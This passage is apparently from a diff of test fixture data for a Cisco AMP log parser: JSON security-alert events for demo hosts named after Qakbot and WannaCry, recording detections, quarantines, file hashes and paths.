"windows", + "input.type": "log", + "log.offset": 29393, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:09:00.000Z", + "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", + "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1493058569636000800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "event.start": "2021-01-14T14:09:00.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/Windows/SysWOW64/cmd.exe", + "fileset.name": "amp", + "host.hostname": 
"Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 30752, + "process.hash.sha256": "b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:46:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6264772016730013699", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 611000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772016730014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 32509, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:46:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D5221F6847-100.SBX.TG", + "cisco.amp.detection_id": "6264772016730013699", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 65000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772016730014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "48a0bf05b9706a00d2a0ff6260412f11", + "file.hash.sha1": "5058b16a86beee96927371210b9a9f682976a50a", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 33628, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "48a0bf05b9706a00d2a0ff6260412f11", + "5058b16a86beee96927371210b9a9f682976a50a" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:45:59.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + 
"cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D5221F6847-100.SBX.TG", + "cisco.amp.detection_id": "6264772012435046402", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 940000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772012435046000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "Unconfirmed 762952.crdownload", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34974, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214500913741862", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + 
"cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 724000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 36260, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741862", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 366000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + 
"file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 37453, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741859", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + 
"host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 38805, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 5580, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741858", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 210000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": 
"C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40328, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741855", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 194000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + 
"host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 41673, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741857", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": 
"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43279, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741856", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 163000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": 
"mssecsvc.exe", + "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44631, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214500913741856", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 709000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45976, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + 
"service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214488028839966", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 447000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214492323807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 47096, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419214488028839966", + "cisco.amp.event_type_id": 1090519054, + 
"cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 916000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214488028840000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 48216, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 5580, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:29:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": 
"53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.event_type_id": 1107296257, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 535214029, + "event.action": "Potential Dropper Infection", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945890085425, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T13:29:36.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 49823, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:28:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 341000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412574627503014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": 
"Demo_Qakbot_3", + "input.type": "log", + "log.offset": 51019, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204910251769881", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + 